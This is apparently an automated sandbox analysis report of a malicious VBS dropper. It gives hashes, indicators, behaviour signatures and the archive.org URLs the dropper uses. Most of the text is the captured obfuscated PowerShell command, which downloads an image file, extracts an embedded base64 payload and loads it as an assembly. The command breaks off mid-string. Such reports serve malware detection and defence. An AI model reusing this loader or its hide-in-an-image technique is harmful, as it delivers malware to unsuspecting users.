Overview

overview

10

Static

static

1

sweetnesso...th.vbs

windows7-x64

10

sweetnesso...th.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    28-08-2024 08:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sweetnessofcookiesmilkeatingbymewith.vbs

  • Size

    179KB

  • MD5

    caf64b2016e2f4caf70d865690f7e5e0

  • SHA1

    1ff3d5ebda9b1105e684101f201d6ccde03568f8

  • SHA256

    5132ba606b767573c897b02e29221c615bcf10c430dc99dd313fa9e12a08b114

  • SHA512

    7a5481edd308256d30a6bd8346f9288f7a1290946c12caed7a64479820ece31f444169946543c67ce051ec085e6e31d18cd6af0a2cef8f99f36d57250b311258

  • SSDEEP

    3072:fBn3/sPeR6bdgt5prGweSqD2y8LscCV61wAZe:fBP+bTgscCM1wAZe

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sweetnessofcookiesmilkeatingbymewith.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟VQBy□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟JwBo□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bw□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟Og□ ⿉ ㋃ ⼏ ⫟v□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟aQBh□ ⿉ ㋃ ⼏ ⫟Dg□ ⿉ ㋃ ⼏ ⫟M□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟z□ ⿉ ㋃ ⼏ ⫟DE□ ⿉ ㋃ ⼏ ⫟M□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟dQBz□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟YQBy□ ⿉ ㋃ ⼏ ⫟GM□ ⿉ ㋃ ⼏ ⫟a□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟HY□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟cgBn□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟Mg□ ⿉ ㋃ ⼏ ⫟3□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟aQB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQBz□ ⿉ ㋃ ⼏ ⫟C8□ ⿉ ㋃ ⼏ ⫟dgBi□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟Xw□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟D□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟Mg□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟D□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟Nw□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟DY□ ⿉ ㋃ ⼏ ⫟Xw□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟D□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟Mg□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟D□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟Nw□ ⿉ ㋃ ⼏ ⫟y□ ⿉ ㋃ ⼏ ⫟DY□ ⿉ ㋃ ⼏ ⫟LwB2□ ⿉ ㋃ ⼏ ⫟GI□ ⿉ ㋃ ⼏ ⫟cw□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Go□ ⿉ ㋃ ⼏ ⫟c□ ⿉ ㋃ ⼏ ⫟Bn□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Hc□ ⿉ ㋃ ⼏ ⫟ZQBi□ ⿉ ㋃ ⼏ ⫟EM□ ⿉ ㋃ ⼏ ⫟b□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bgB0□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟PQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟E4□ ⿉ ㋃ ⼏ ⫟ZQB3□ ⿉ ㋃ ⼏ ⫟C0□ ⿉ ㋃ ⼏ ⫟TwBi□ ⿉ ㋃ ⼏ ⫟Go□ ⿉ ㋃ ⼏ ⫟ZQBj□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟BT□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟E4□ ⿉ ㋃ ⼏ ⫟ZQB0□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟VwBl□ ⿉ ㋃ ⼏ ⫟GI□ ⿉ ㋃ ⼏ ⫟QwBs□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟ZQBC□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟B3□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟YgBD□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟aQBl□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟EQ□ ⿉ ㋃ ⼏ ⫟bwB3□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟b□ ⿉ ㋃ ⼏ ⫟Bv□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BE□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟Cg□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟VQBy□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟KQ□ ⿉ ㋃ ⼏ ⫟7□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟aQBt□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟ZwBl□ ⿉ ㋃ ⼏ ⫟FQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟WwBT□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟FQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟LgBF□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟YwBv□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟aQBu□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟XQ□ ⿉ ㋃ ⼏ ⫟6□ ⿉ ㋃ ⼏ ⫟Do□ ⿉ ㋃ ⼏ ⫟VQBU□ ⿉ ㋃ ⼏ ⫟EY□ ⿉ ㋃ ⼏ ⫟O□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Ec□ ⿉ ㋃ ⼏ ⫟ZQB0□ ⿉ ㋃ ⼏ ⫟FM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟By□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟bgBn□ ⿉ ㋃ ⼏ ⫟Cg□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟QgB5□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟ZQBz□ ⿉ ㋃ ⼏ ⫟Ck□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BG□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟PQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟P□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟8□ ⿉ ㋃ ⼏ ⫟EI□ ⿉ ㋃ ⼏ ⫟QQBT□ ⿉ ㋃ ⼏ ⫟EU□ ⿉ ㋃ ⼏ ⫟Ng□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟F8□ ⿉ ㋃ ⼏ ⫟UwBU□ ⿉ ㋃ ⼏ ⫟EE□ ⿉ ㋃ ⼏ ⫟UgBU□ ⿉ ㋃ ⼏ ⫟D4□ ⿉ ㋃ ⼏ ⫟Pg□ ⿉ ㋃ ⼏ ⫟n□ ⿉ ㋃ ⼏ ⫟Ds□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BG□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟PQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟P□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟8□ ⿉ ㋃ ⼏ ⫟EI□ ⿉ ㋃ ⼏ ⫟QQBT□ ⿉ ㋃ ⼏ ⫟EU□ ⿉ ㋃ ⼏ ⫟Ng□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟F8□ ⿉ ㋃ ⼏ ⫟RQBO□ ⿉ ㋃ ⼏ ⫟EQ□ ⿉ ㋃ ⼏ ⫟Pg□ ⿉ ㋃ ⼏ ⫟+□ ⿉ ㋃ ⼏ ⫟Cc□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BJ□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bp□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟V□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟bgBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟BP□ ⿉ ㋃ ⼏ ⫟GY□ ⿉ ㋃ ⼏ ⫟K□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BG□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟Ck□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bgBk□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟bgBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟ZQBU□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟B0□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟E8□ ⿉ ㋃ ⼏ ⫟Zg□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟RgBs□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟Zw□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟Ds□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bz□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟YQBy□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟LQBn□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟w□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟LQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟LQBn□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BJ□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BJ□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟r□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BG□ ⿉ ㋃ ⼏ ⫟Gw□ ⿉ ㋃ ⼏ ⫟YQBn□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟T□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟ZwB0□ ⿉ ㋃ ⼏ ⫟Gg□ ⿉ ㋃ ⼏ ⫟Ow□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟GI□ ⿉ ㋃ ⼏ ⫟YQBz□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟Ng□ ⿉ ㋃ ⼏ ⫟0□ ⿉ ㋃ ⼏ ⫟Ew□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bo□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟PQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟ZQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟SQBu□ ⿉ ㋃ ⼏ ⫟GQ□ ⿉ ㋃ ⼏ ⫟ZQB4□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟LQ□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟cgB0□ ⿉ ㋃ ⼏ ⫟Ek□ ⿉ ㋃ ⼏ ⫟bgBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟7□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YgBh□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟2□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟QwBv□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟D0□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟Gk□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟ZQBU□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟e□ ⿉ ㋃ ⼏ ⫟B0□ ⿉ ㋃ ⼏ ⫟C4□ ⿉ ㋃ ⼏ ⫟UwB1□ ⿉ ㋃ ⼏ ⫟GI□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟aQBu□ ⿉ ㋃ ⼏ ⫟Gc□ ⿉ ㋃ ⼏ ⫟K□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟k□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bh□ ⿉ ㋃ ⼏ ⫟HI□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟BJ□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟Hg□ ⿉ ㋃ ⼏ ⫟L□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟g□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YgBh□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟2□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟T□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟ZwB0□ ⿉ ㋃ ⼏ ⫟Gg□ ⿉ ㋃ ⼏ ⫟KQ□ ⿉ ㋃ ⼏ ⫟7□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YwBv□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BC□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟d□ ⿉ ㋃ ⼏ ⫟Bl□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ ㋃ ⼏ ⫟C□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟WwBT□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟cwB0□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟bQ□ ⿉ ㋃ ⼏ ⫟u□ ⿉ ㋃ ⼏ ⫟EM□ ⿉ ㋃ ⼏ ⫟bwBu□ ⿉ ㋃ ⼏ ⫟HY□ ⿉ ㋃ ⼏ ⫟ZQBy□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟XQ□ ⿉ ㋃ ⼏ ⫟6□ ⿉ ㋃ ⼏ ⫟Do□ ⿉ ㋃ ⼏ ⫟RgBy□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟bQBC□ ⿉ ㋃ ⼏ ⫟GE□ ⿉ ㋃ ⼏ ⫟cwBl□ ⿉ ㋃ ⼏ ⫟DY□ ⿉ ㋃ ⼏ ⫟N□ ⿉ ㋃ ⼏ ⫟BT□ ⿉ ㋃ ⼏ ⫟HQ□ ⿉ ㋃ ⼏ ⫟cgBp□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Zw□ ⿉ ㋃ ⼏ ⫟o□ ⿉ ㋃ ⼏ ⫟CQ□ ⿉ ㋃ ⼏ ⫟YgBh□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟ZQ□ ⿉ ㋃ ⼏ ⫟2□ ⿉ ㋃ ⼏ ⫟DQ□ ⿉ ㋃ ⼏ ⫟QwBv□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟bQBh□ ⿉ ㋃ ⼏ ⫟G4□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟p□ ⿉ ㋃ ⼏ ⫟Ds□ ⿉ ㋃ ⼏ ⫟J□ ⿉ ㋃ ⼏ ⫟Bs□ ⿉ ㋃ ⼏ ⫟G8□ ⿉ ㋃ ⼏ ⫟YQBk□ ⿉ ㋃ ⼏ ⫟GU□ ⿉ ㋃ ⼏ ⫟Z□ ⿉ ㋃ ⼏ ⫟BB□ ⿉ ㋃ ⼏ ⫟HM□ ⿉ ㋃ ⼏ ⫟cwBl□ ⿉ ㋃ ⼏ ⫟G0□ ⿉ ㋃ ⼏ ⫟YgBs□ ⿉ ㋃ ⼏ ⫟Hk□ ⿉ ㋃ ⼏ ⫟I□ ⿉ ㋃ ⼏ ⫟□ ⿉ ㋃ ⼏ ⫟9□ ⿉ 